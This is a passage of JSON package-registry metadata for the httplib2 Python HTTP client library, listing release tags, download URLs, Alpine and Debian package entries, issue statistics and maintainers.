tplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-22T13:24:45.577Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:apk/alpine/py3-httplib2-pyc?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.23","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-httplib2-pyc","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-httplib2-pyc","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-httplib2-pyc/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-21T12:09:40.812Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/packages/py3-httplib2-pyc/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/packages/py3-httplib2-pyc/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/packages/py3-httplib2-pyc/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/packages/py3-httplib2-pyc/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/packages/py3-httplib2-pyc/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/packages/py3-httplib2-pyc/codemeta","maintainers":[{"uuid":"fabian@affolter-engineering.ch","login":null,"name":"Fabian Affolter","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","packages_count":119,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","role":null,"created_at":"2026-03-01T08:09:46.597Z","updated_at":"2026-03-01T08:09:46.597Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/maintainers/fabian@affolter-engineering.ch/packages"}],"registry":{"name":"alpine-v3.23","url":"https://pkgs.alpinelinux.org/packages?branch=v3.23","ecosystem":"alpine","default":false,"packages_count":27576,"maintainers_count":428,"namespaces_count":2,"keywords_count":189,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":1051},"icon_url":"https://github.com/alpinelinux.png","created_at":"2026-01-24T14:35:50.739Z","updated_at":"2026-08-25T05:04:59.407Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/namespaces"}},{"id":13707617,"name":"python-httplib2","ecosystem":"debian","description":null,"homepage":"https://github.com/httplib2/httplib2","licenses":"other","normalized_licenses":[],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":["libs"],"namespace":"main","versions_count":1,"first_release_published_at":"2026-02-12T22:28:48.870Z","latest_release_published_at":"2026-02-12T22:28:48.870Z","latest_release_number":"0.20.4-3","last_synced_at":"2026-03-13T07:50:36.549Z","created_at":"2026-02-12T22:28:48.711Z","updated_at":"2026-08-22T13:24:45.884Z","registry_url":"https://tracker.debian.org/pkg/python-httplib2","install_command":"apt-get install python-httplib2","documentation_url":"https://packages.debian.org/bookworm/python-httplib2","metadata":{"component":"main","architecture":"all","priority":"source","binary":"python3-httplib2","standards_version":"4.6.2","maintainer":"Debian Python Team \u003cteam+python@tracker.debian.org\u003e","build_depends":"ca-certificates, debhelper-compat (= 13), dh-sequence-python3, pybuild-plugin-pyproject, python3-all, python3-cryptography \u003c!nocheck\u003e, python3-pyparsing \u003c!nocheck\u003e, python3-pytest \u003c!nocheck\u003e, python3-pytest-timeout \u003c!nocheck\u003e, python3-six \u003c!nocheck\u003e, python3-setuptools","build_depends_indep":null,"build_depends_arch":null},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":512,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-21T12:21:59.455Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-19T07:11:22.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg